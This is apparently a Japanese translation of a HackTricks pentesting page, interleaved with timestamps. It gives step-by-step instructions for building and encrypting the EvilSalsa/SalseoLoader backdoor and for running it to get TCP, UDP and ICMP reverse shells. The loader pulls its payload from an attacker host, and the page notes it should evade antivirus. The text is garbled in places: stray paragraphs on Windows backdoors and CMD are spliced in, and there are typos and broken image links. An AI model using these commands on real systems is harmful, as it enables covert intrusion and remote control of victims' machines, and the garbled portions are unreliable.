2022-08-04 20:47:35 +00:00
# Salseo
2022-04-28 16:01:33 +00:00
< details >
2023-04-25 18:35:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
2023-08-15 18:34:02 +00:00
* [**公式のPEASS& ](https://peass.creator-spring.com )を手に入れましょう。
2023-07-07 23:42:27 +00:00
* [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo** ](https://github.com/carlospolop/hacktricks ) **と** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ) **に提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
2023-07-07 23:42:27 +00:00
## バイナリのコンパイル
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
githubからソースコードをダウンロードし、**EvilSalsa**と**SalseoLoader**をコンパイルします。コードをコンパイルするには**Visual Studio**が必要です。
2020-07-15 15:43:14 +00:00
2023-08-15 18:34:02 +00:00
これらのプロジェクトを、使用するWindowsボックスのアーキテクチャに合わせてコンパイルします( )
2020-07-15 15:43:14 +00:00
2023-08-15 18:34:02 +00:00
Visual Studio内で、**左側の"Build"タブ**の**"Platform Target"**でアーキテクチャを**選択**できます。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
(\*\*このオプションが見つからない場合は、**"Project Tab"**を押し、次に**"\<Project Name> Properties"**を押します)
2020-07-15 15:43:14 +00:00
2022-08-10 14:32:58 +00:00
 . png > )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
次に、両方のプロジェクトをビルドします( ) ( ) :
2020-07-15 15:43:14 +00:00
2022-09-27 00:14:52 +00:00
 ( 2 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
## バックドアの準備
2020-07-15 15:43:14 +00:00
2023-08-15 18:34:02 +00:00
まず、**EvilSalsa.dll**をエンコードする必要があります。これには、Pythonスクリプト**encrypterassembly.py**を使用するか、プロジェクト**EncrypterAssembly**をコンパイルすることができます:
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### **Python**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python EncrypterAssembly/encrypterassembly.py < FILE > < PASSWORD > < OUTPUT_FILE >
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
2022-08-04 20:47:35 +00:00
### Windows
2020-07-15 15:43:14 +00:00
2023-08-15 18:34:02 +00:00
Windows( )
2023-07-07 23:42:27 +00:00
2023-08-15 18:34:02 +00:00
#### リモートデスクトップ( )
2023-07-07 23:42:27 +00:00
2023-08-15 18:34:02 +00:00
リモートデスクトップ( )
2023-07-07 23:42:27 +00:00
2023-08-15 18:34:02 +00:00
#### サービスバックドア
2023-07-07 23:42:27 +00:00
2023-08-15 18:34:02 +00:00
Windowsでは、バックグラウンドで実行されるサービスがあります。ハッカーは、これらのサービスにバックドアを仕込むことで、システムに不正アクセスすることができます。サービスバックドアを作成するためには、既存のサービスを悪用する方法や、新しいサービスを作成する方法があります。
2023-07-07 23:42:27 +00:00
2023-08-15 18:34:02 +00:00
#### ユーザーアカウントバックドア
2023-07-07 23:42:27 +00:00
2023-08-15 18:34:02 +00:00
Windowsでは、ユーザーアカウントを使用してシステムにログインします。ハッカーは、ユーザーアカウントにバックドアを仕込むことで、システムに不正アクセスすることができます。ユーザーアカウントバックドアを作成するためには、既存のユーザーアカウントを悪用する方法や、新しいユーザーアカウントを作成する方法があります。
2023-07-07 23:42:27 +00:00
2023-08-15 18:34:02 +00:00
これらは、Windowsで使用される一般的なバックドア作成テクニックの一部です。ハッカーはこれらのテクニックを悪用してシステムに侵入することができるため、セキュリティ対策を強化する必要があります。
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
EncrypterAssembly.exe < FILE > < PASSWORD > < OUTPUT_FILE >
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
2023-08-15 18:34:02 +00:00
よし、これでSalseoのすべてを実行するために必要なものが揃いました: **エンコードされたEvilDalsa.dll**と**SalseoLoaderのバイナリ**です。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
**SalseoLoader.exeバイナリをマシンにアップロードしてください。どのAVにも検出されないはずです...**
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
## **バックドアの実行**
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
### **TCPリバースシェルの取得( )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
リバースシェルリスナーとHTTPサーバーを起動して、エンコードされたevilsalsaを提供することを忘れないでください。
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password http://< Attacker-IP > /evilsalsa.dll.txt reversetcp < Attacker-IP > < Port >
```
2023-08-15 18:34:02 +00:00
### **UDPリバースシェルの取得( )
2020-07-15 15:43:14 +00:00
2023-08-15 18:34:02 +00:00
リバースシェルのリスナーとしてncを起動し、エンコードされたevilsalsaを提供するためのSMBサーバー( )
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password \\< Attacker-IP > /folder/evilsalsa.dll.txt reverseudp < Attacker-IP > < Port >
```
2023-07-07 23:42:27 +00:00
### **ICMPリバースシェルの取得( )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
**今回は、クライアント側でリバースシェルを受け取るための特別なツールが必要です。ダウンロードしてください:** [**https://github.com/inquisb/icmpsh** ](https://github.com/inquisb/icmpsh )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
#### **ICMP応答の無効化:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
2023-08-15 18:34:02 +00:00
#### クライアントを実行する:
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
```bash
./client
```
2020-07-15 15:43:14 +00:00
2023-08-15 18:34:02 +00:00
The client will connect to the server and wait for commands.
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python icmpsh_m.py "< Attacker-IP > " "< Victm-IP > "
```
2023-07-07 23:42:27 +00:00
#### ターゲット内部で、salseoの実行を行います:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp < Attacker-IP >
```
2023-07-07 23:42:27 +00:00
## DLLのエクスポートメイン関数としてSalseoLoaderをコンパイルする
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
Visual Studioを使用してSalseoLoaderプロジェクトを開きます。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
### メイン関数の前に\[DllExport]を追加します。
2020-07-15 15:43:14 +00:00
2023-08-15 18:34:02 +00:00
 ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
### このプロジェクトにDllExportをインストールします。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
#### **ツール** --> **NuGetパッケージマネージャー** --> **ソリューションのNuGetパッケージを管理...**
2020-07-15 15:43:14 +00:00
2023-06-14 10:51:55 +00:00
 ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-08-15 18:34:02 +00:00
#### **DllExportパッケージを検索( ) ( )
2020-07-15 15:43:14 +00:00
2023-06-14 10:51:55 +00:00
 ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
プロジェクトフォルダには、**DllExport.bat**と**DllExport\_Configure.bat**のファイルが表示されます。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
### DllExportをアンインストールします。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
**アンインストール**を押します(はい、奇妙ですが、信じてください、必要です)
2020-07-15 15:43:14 +00:00
2023-06-14 10:51:55 +00:00
 ( 1 ) ( 1 ) ( 2 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
### Visual Studioを終了し、DllExport\_configureを実行します。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
Visual Studioを**終了**します。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
次に、**SalseoLoaderフォルダ**に移動し、**DllExport\_Configure.bat**を実行します。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
**x64**を選択します( ) (
2020-07-15 15:43:14 +00:00
2023-02-27 09:14:27 +00:00
 ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
### Visual Studioでプロジェクトを再度開きます。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
**\[DllExport]**はもはやエラーとしてマークされません。
2020-07-15 15:43:14 +00:00
2023-06-13 10:12:02 +00:00
 ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
### ソリューションをビルドします。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
**出力の種類 = クラスライブラリ**を選択します(プロジェクト --> SalseoLoaderのプロパティ --> アプリケーション --> 出力の種類 = クラスライブラリ)
2020-07-15 15:43:14 +00:00
2022-10-22 15:26:54 +00:00
 ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-08-15 18:34:02 +00:00
**x64** **プラットフォーム**を選択します(プロジェクト --> SalseoLoaderのプロパティ --> ビルド --> プラットフォームターゲット = x64)
2020-07-15 15:43:14 +00:00
2022-09-02 15:27:38 +00:00
 ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-08-15 18:34:02 +00:00
ソリューションを**ビルド**するには:ビルド --> ソリューションのビルド( )
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
### 生成されたDLLをテストします。
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
テストしたい場所にDLLをコピーして貼り付けます。
2020-07-15 15:43:14 +00:00
2023-08-15 18:34:02 +00:00
実行します:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
rundll32.exe SalseoLoader.dll,main
```
2023-08-15 18:34:02 +00:00
エラーが表示されない場合、おそらく機能するDLLを持っています!
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
## DLLを使用してシェルを取得する
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
**HTTPサーバー**を使用して、**ncリスナー**を設定することを忘れないでください。
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### Powershell
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
2023-08-15 18:34:02 +00:00
### CMD
CMD (Command Prompt) is a command-line interpreter in Windows operating systems. It provides a way to interact with the system through text-based commands. CMD can be used to execute various commands, navigate through directories, run scripts, and perform administrative tasks. It is a powerful tool for both legitimate users and hackers, as it allows for direct control and manipulation of the system. Hackers often use CMD to execute malicious commands, create backdoors, and gain unauthorized access to a target system. It is important for system administrators and security professionals to be familiar with CMD and its capabilities in order to detect and prevent unauthorized activities.
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
2022-04-28 16:01:33 +00:00
< details >
2023-04-25 18:35:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2023-08-15 18:34:02 +00:00
* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)をチェックしてください!
2023-07-07 23:42:27 +00:00
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASS& ](https://peass.creator-spring.com )を手に入れましょう。
* [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
2023-08-15 18:34:02 +00:00
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo** ](https://github.com/carlospolop/hacktricks ) **と** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ) **に提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
